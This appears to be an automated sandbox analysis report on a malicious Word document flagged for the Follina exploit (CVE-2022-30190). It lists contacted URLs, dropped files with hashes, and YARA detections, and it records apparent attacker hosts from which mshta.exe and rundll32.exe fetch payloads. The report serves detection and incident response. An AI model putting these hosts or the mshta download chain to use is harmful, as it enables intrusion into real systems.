              https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                high
                https://autodiscover-s.outlook.com/898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                  high
                  https://roaming.edog.898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                  • URL Reputation: safe
                  unknown
                  https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                    high
                    https://cdn.entity.898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                    • URL Reputation: safe
                    unknown
                    https://api.addins.omex.office.net/appinfo/query898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                      high
                      https://clients.config.office.net/user/v1.0/tenantassociationkey898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                        high
                        https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                          high
                          https://powerlift.acompli.net898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                          • URL Reputation: safe
                          unknown
                          https://rpsticket.partnerservices.getmicrosoftkey.com898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                          • URL Reputation: safe
                          unknown
                          https://lookup.onenote.com/lookup/geolocation/v1898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                            high
                            https://cortana.ai898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                            • URL Reputation: safe
                            unknown
                            https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                              high
                              https://cloudfiles.onenote.com/upload.aspx898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                high
                                https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                  high
                                  https://entitlement.diagnosticssdf.office.com898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                    high
                                    https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                      high
                                      https://api.aadrm.com/898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                      • URL Reputation: safe
                                      unknown
                                      https://ofcrecsvcapi-int.azurewebsites.net/898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                      • URL Reputation: safe
                                      unknown
                                      https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                        high
                                        https://api.microsoftstream.com/api/898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                          high
                                          https://insertmedia.bing.office.net/images/hosted?host=office&amp;adlt=strict&amp;hostType=Immersive898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                            high
                                            https://cr.office.com898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                              high
                                              https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                              • Avira URL Cloud: safe
                                              low
                                              http://159.75.135.162:61256/dllhost.htaindowsINetCookiesF&mshta.exe, 00000019.00000002.559370717.0000000000A1C000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://portal.office.com/account/?ref=ClientMeControl898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                                high
                                                https://graph.ppe.windows.net898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                                  high
                                                  https://res.getmicrosoftkey.com/api/redemptionevents898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://powerlift-frontdesk.acompli.net898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://tasks.office.com898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                                    high
                                                    https://officeci.azurewebsites.net/api/898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://sr.outlook.office.net/ws/speech/recognize/assistant/work898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                                      high
                                                      http://159.75.135.162:61256/dllhost.htaVmshta.exe, 00000019.00000002.559370717.0000000000A1C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://store.office.cn/addinstemplate898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://159.75.135.162:61256/dllhost.htaYmshta.exe, 00000019.00000002.559370717.0000000000A1C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://api.aadrm.com898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      https://106.55.17.200:62002/rundll32.exe, 0000001E.00000002.556713488.0000000002DDA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://outlook.office.com/autosuggest/api/v1/init?cvid=898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                                        high
                                                        https://globaldisco.crm.dynamics.com898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                                          high
                                                          https://messaging.engagement.office.com/898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                                            high
                                                            https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                                              high
                                                              https://dev0-api.acompli.net/autodetect898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://www.odwebp.svc.ms898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://api.diagnosticssdf.office.com/v2/feedback898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                                                high
                                                                https://api.powerbi.com/v1.0/myorg/groups898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                                                  high
                                                                  https://web.microsoftstream.com/video/898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                                                    high
                                                                    https://api.addins.store.officeppe.com/addinstemplate898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    https://graph.windows.net898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                                                      high
                                                                      http://159.75.135.162:61256/dllhost.htagmshta.exe, 00000019.00000002.559370717.0000000000A1C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://dataservice.o365filtering.com/898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      http://159.75.135.162:61256/dllhost.htaET4.C:mshta.exe, 00000019.00000002.559444903.0000000000A6A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://officesetup.getmicrosoftkey.com898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      https://analysis.windows.net/powerbi/api898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                                                        high
                                                                        https://prod-global-autodetect.acompli.net/autodetect898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        https://outlook.office365.com/autodiscover/autodiscover.json898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                                                          high
                                                                          https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                                                            high
                                                                            https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                                                              high
                                                                              https://learningtools.onenote.com/learningtoolsapi/v2.0/Getvoices898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                                                                high
                                                                                https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                                                                  high
                                                                                  https://ncus.contentsync.898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                                                                  • URL Reputation: safe
                                                                                  unknown
                                                                                  https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                                                                    high
                                                                                    https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                                                                      high
                                                                                      http://weather.service.msn.com/data.aspx898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                                                                        high
                                                                                        https://apis.live.net/v5.0/898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                                                                        • URL Reputation: safe
                                                                                        unknown
                                                                                        https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                                                                          high
                                                                                          https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                                                                            high
                                                                                            https://messaging.lifecycle.office.com/898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                                                                              high
                                                                                              https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                                                                                high
                                                                                                https://management.azure.com898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                                                                                  high
                                                                                                  https://outlook.office365.com898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                                                                                    high
                                                                                                    https://wus2.contentsync.898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                                                                                    • URL Reputation: safe
                                                                                                    unknown
                                                                                                    https://incidents.diagnostics.office.com898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                                                                                      high
                                                                                                      https://clients.config.office.net/user/v1.0/ios898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                                                                                        high
                                                                                                        https://insertmedia.bing.office.net/odc/insertmedia898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                                                                                          high
                                                                                                          https://o365auditrealtimeingestion.manage.office.com898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                                                                                            high
                                                                                                            https://outlook.office365.com/api/v1.0/me/Activities898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                                                                                              high
                                                                                                              https://api.office.net898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                                                                                                high
                                                                                                                https://incidents.diagnosticssdf.office.com898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                                                                                                  high
                                                                                                                  https://asgsmsproxyapi.azurewebsites.net/898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  unknown
                                                                                                                  https://clients.config.office.net/user/v1.0/android/policies898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                                                                                                    high
                                                                                                                    https://106.55.17.200/rundll32.exe, 0000001E.00000002.556934937.0000000002E27000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    unknown
                                                                                                                    https://entitlement.diagnostics.office.com898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                                                                                                      high
                                                                                                                      https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                                                                                                        high
                                                                                                                        https://substrate.office.com/search/api/v2/init898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                                                                                                          high
                                                                                                                          https://outlook.office.com/898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                                                                                                            high
                                                                                                                            https://storage.live.com/clientlogs/uploadlocation898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                                                                                                              high
                                                                                                                              https://outlook.office365.com/898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                                                                                                                high
                                                                                                                                https://webshell.suite.office.com898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                                                                                                                  high
                                                                                                                                  https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                                                                                                                    high
                                                                                                                                    https://substrate.office.com/search/api/v1/SearchHistory898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                                                                                                                      high
                                                                                                                                      https://106.55.17.200:62002/jquery-3.3.1.slim.min.jsrundll32.exe, 0000001E.00000002.556915406.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000002.556560356.0000000002D6B000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000002.556713488.0000000002DDA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                      unknown
                                                                                                                                      https://management.azure.com/898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                                                                                                                        high
                                                                                                                                        https://messaging.lifecycle.office.com/getcustommessage16898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                                                                                                                          high
                                                                                                                                          https://clients.config.office.net/c2r/v1.0/InteractiveInstallation898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                                                                                                                            high
                                                                                                                                            https://login.windows.net/common/oauth2/authorize898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                                                                                                                              high
                                                                                                                                              https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              unknown
                                                                                                                                              • No. of IPs < 25%
                                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                                              • 75% < No. of IPs
                                                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                              159.75.135.162
                                                                                                                                              unknownChina
                                                                                                                                              1257TELE2EUfalse
                                                                                                                                              101.33.231.81
                                                                                                                                              unknownChina
                                                                                                                                              132203TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCNtrue
                                                                                                                                              IP
                                                                                                                                              192.168.2.1
                                                                                                                                              Joe Sandbox Version:35.0.0 Citrine
                                                                                                                                              Analysis ID:647003
                                                                                                                                              Start date and time: 16/06/202214:18:502022-06-16 14:18:50 +02:00
                                                                                                                                              Joe Sandbox Product:CloudBasic
                                                                                                                                              Overall analysis duration:0h 7m 59s
                                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                                              Report type:light
                                                                                                                                              Sample file name:V3g2Pfu707.docx
                                                                                                                                              Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                              Run name:Potential for more IOCs and behavior
                                                                                                                                              Number of analysed new started processes analysed:35
                                                                                                                                              Number of new started drivers analysed:1
                                                                                                                                              Number of existing processes analysed:0
                                                                                                                                              Number of existing drivers analysed:0
                                                                                                                                              Number of injected processes analysed:0
                                                                                                                                              Technologies:
                                                                                                                                              • HCA enabled
                                                                                                                                              • EGA enabled
                                                                                                                                              • HDC enabled
                                                                                                                                              • AMSI enabled
                                                                                                                                              Analysis Mode:default
                                                                                                                                              Analysis stop reason:Timeout
                                                                                                                                              Detection:MAL
                                                                                                                                              Classification:mal92.troj.expl.evad.winDOCX@18/34@0/3
                                                                                                                                              EGA Information:Failed
                                                                                                                                              HDC Information:Failed
                                                                                                                                              HCA Information:
                                                                                                                                              • Successful, ratio: 100%
                                                                                                                                              • Number of executed functions: 0
                                                                                                                                              • Number of non-executed functions: 0
                                                                                                                                              Cookbook Comments:
                                                                                                                                              • Found application associated with file extension: .docx
                                                                                                                                              • Adjust boot time
                                                                                                                                              • Enable AMSI
                                                                                                                                              • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                              • Attach to Office via COM
                                                                                                                                              • Scroll down
                                                                                                                                              • Close Viewer
                                                                                                                                              • Exclude process from analysis (whitelisted): sdiagnhost.exe, mrxdav.sys, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
                                                                                                                                              • TCP Packets have been reduced to 100
                                                                                                                                              • Excluded IPs from analysis (whitelisted): 23.211.6.115, 52.109.76.141, 52.109.88.37, 52.109.76.34, 52.109.88.38, 52.109.88.40
                                                                                                                                              • Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, prod-w.nexus.live.com.akadns.net, prod.configsvc1.live.com.akadns.net, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, login.live.com, store-images.s-microsoft.com, config.officeapps.live.com, sls.update.microsoft.com, nexus.officeapps.live.com, displaycatalog.mp.microsoft.com, officeclient.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, europe.configsvc1.live.com.akadns.net
                                                                                                                                              • Execution Graph export aborted for target mshta.exe, PID 5852 because there are no executed function
                                                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                              • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                              • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                              • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                                                                                                                              No simulations
                                                                                                                                              No context
                                                                                                                                              No context
                                                                                                                                              No context
                                                                                                                                              No context
                                                                                                                                              No context
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                              File Type:Microsoft Access Database
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):528384
                                                                                                                                              Entropy (8bit):0.4747870240005237
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:384:LGfXq/JCQq8SFYfZ0jGB7wAUFgWCQwtZ1IX+hVZO4Fg:ifXqCJHoZJHgTCQ/kI
                                                                                                                                              MD5:12112B6883306BD90398B9A7656963A9
                                                                                                                                              SHA1:D1CCC28F7C0EB31D4DA0A482B666BB9F3033BE2E
                                                                                                                                              SHA-256:028E95FEE1637EA8873C77BBA6E9C7ADC65179D2808AA74E148DB93EC32EF04F
                                                                                                                                              SHA-512:F5F26D241D3802BD1358126779FBF02DC0BDC381C49B5F6B881FCD33828A7F2D8373D162C8027D20B28CF8590CB76F1591DA74CD80304D114C2AA1ADF33A2539
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:....Standard ACE DB......n.b`..U.gr@?..~.....1.y..0...c...F...N>U.7...~.(...`.:{6M...Z.Cw..3..y[*.|*..|......~;...f_...$.g..'D...e....F.x....-b.T...4.0.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):36
                                                                                                                                              Entropy (8bit):2.730660070105504
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:5NixJlElGUR:WrEcUR
                                                                                                                                              MD5:1F830B53CA33A1207A86CE43177016FA
                                                                                                                                              SHA1:BDF230E1F33AFBA5C9D5A039986C6505E8B09665
                                                                                                                                              SHA-256:EAF9CDC741596275E106DDDCF8ABA61240368A8C7B0B58B08F74450D162337EF
                                                                                                                                              SHA-512:502248E893FCFB179A50863D7AC1866B5A466C9D5781499EBC1D02DF4F6D3E07B9E99E0812E747D76734274BD605DAD6535178D6CE06F08F1A02AB60335DE066
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:C.e.n.t.r.a.l.T.a.b.l.e...a.c.c.d.b.
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):64
                                                                                                                                              Entropy (8bit):1.3860360556164644
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:OFaV:iu
                                                                                                                                              MD5:91E91175EF0AB69EE1660DC75973E103
                                                                                                                                              SHA1:80EB1413A74C338E0F857EA75CBA87BFFA7512D0
                                                                                                                                              SHA-256:2ACB0CB42BD1E4857BC4A5C1CF20AD3D7969A2E9BA955F313CF6D0A5E0B0FD1B
                                                                                                                                              SHA-512:03355BA9D7AB8F32BFFD01F5F6D3133958014701D1B24A6318CBD9038E74DAC97AB10A368B407856E43E5B2A0AEEDECF1B67C1FF74B6AF274E20B8F4A1954249
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:878411. Admin.
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                              File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):148957
                                                                                                                                              Entropy (8bit):5.3567099907271265
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:1536:DcQW/gxgB5BQguw5/Q9DQC+zQWk4F77nXmvid3Xx4ETLKz6e:aJQ9DQC+zPXLI
                                                                                                                                              MD5:76DD06C4CA5D96F76ED18F76747AE7CB
                                                                                                                                              SHA1:48B32707F0C5C47250EA8F7AB076A19FD32395B3
                                                                                                                                              SHA-256:AE2B972071E5BB727F017B277CB7BE8AA557CFD0ECF7181BA9AFBA15C371C97D
                                                                                                                                              SHA-512:BA16320E4CB34DC5541D63D8E18D193343BFCFDF1C029301692951E46407AE2ECD83F66E29E3B77FA8B889C690A97E4FC671F5FAE4ADF1A55CD100D9AC08B174
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2022-06-16T12:19:58">.. Build: 16.0.15414.30527-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                              File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):5737
                                                                                                                                              Entropy (8bit):4.627210073550201
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:t/iGBF2nPW5mDtWID8qImz1I8vHWYMLJS2lpyffnbTc7Oi/EAEwC8EA5KiSe+0gz:tJ5mDtWIDu0GTl9EHbTcKeZEwC8EaKiu
                                                                                                                                              MD5:4C00910BAF865F5D0D7F37F77816B375
                                                                                                                                              SHA1:ADA759E7A00B362553580A89269201257BD6F9E0
                                                                                                                                              SHA-256:32EC74CCEFC7D7FEB5C8817097652FC6014C6217F5B6A2695A95E680D6958153
                                                                                                                                              SHA-512:9C69E8FA9E1F27C6AB0E464A2E7CD1F89E5CACF671A775DC55045A19F3D5DAE98AF5EF3E973FA021DC7E933505AC8B706EA0F8DDB371BB7414E7A75CF933BE27
                                                                                                                                              Malicious:true
                                                                                                                                              Yara Hits:
                                                                                                                                              • Rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22, Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\164F6553.htm, Author: Tobias Michalski, Christian Burkard
                                                                                                                                              • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\164F6553.htm, Author: Joe Security
                                                                                                                                              Preview:<!doctype html>..<html lang="en">..<head>..<title>..Good thing we disabled macros..</title>..</head>..<body>..<p>..Lorem ipsum dolor sit amet, consectetur adipiscing elit. Quisque pellentesque egestas nulla in dignissim. Nam id mauris lorem. Nunc suscipit id magna id mollis. Pellentesque suscipit orci neque, at ornare sapien bibendum eu. Vestibulum malesuada nec sem quis finibus. Nam quis ligula et dui faucibus faucibus. In quis bibendum tortor.....Curabitur rutrum leo tortor, venenatis fermentum ex porttitor vitae. Proin eu imperdiet lorem, ac aliquet risus. Aenean eu sapien pharetra, imperdiet ipsum ut, semper diam. Nulla facilisi. Sed euismod tortor tortor, non eleifend nunc fermentum sit amet. Integer ligula ligula, congue at scelerisque sit amet, porttitor quis felis. Maecenas nec justo varius, semper turpis ut, gravida lorem. Proin arcu ligula, venenatis aliquam tristique ut, pretium quis velit.....Phasellus tristique orci enim, at accumsan velit interdum et. Aenean nec tristique
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                              File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):5737
                                                                                                                                              Entropy (8bit):4.627210073550201
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:t/iGBF2nPW5mDtWID8qImz1I8vHWYMLJS2lpyffnbTc7Oi/EAEwC8EA5KiSe+0gz:tJ5mDtWIDu0GTl9EHbTcKeZEwC8EaKiu
                                                                                                                                              MD5:4C00910BAF865F5D0D7F37F77816B375
                                                                                                                                              SHA1:ADA759E7A00B362553580A89269201257BD6F9E0
                                                                                                                                              SHA-256:32EC74CCEFC7D7FEB5C8817097652FC6014C6217F5B6A2695A95E680D6958153
                                                                                                                                              SHA-512:9C69E8FA9E1F27C6AB0E464A2E7CD1F89E5CACF671A775DC55045A19F3D5DAE98AF5EF3E973FA021DC7E933505AC8B706EA0F8DDB371BB7414E7A75CF933BE27
                                                                                                                                              Malicious:true
                                                                                                                                              Yara Hits:
                                                                                                                                              • Rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22, Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\BE8733D.htm, Author: Tobias Michalski, Christian Burkard
                                                                                                                                              • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\BE8733D.htm, Author: Joe Security
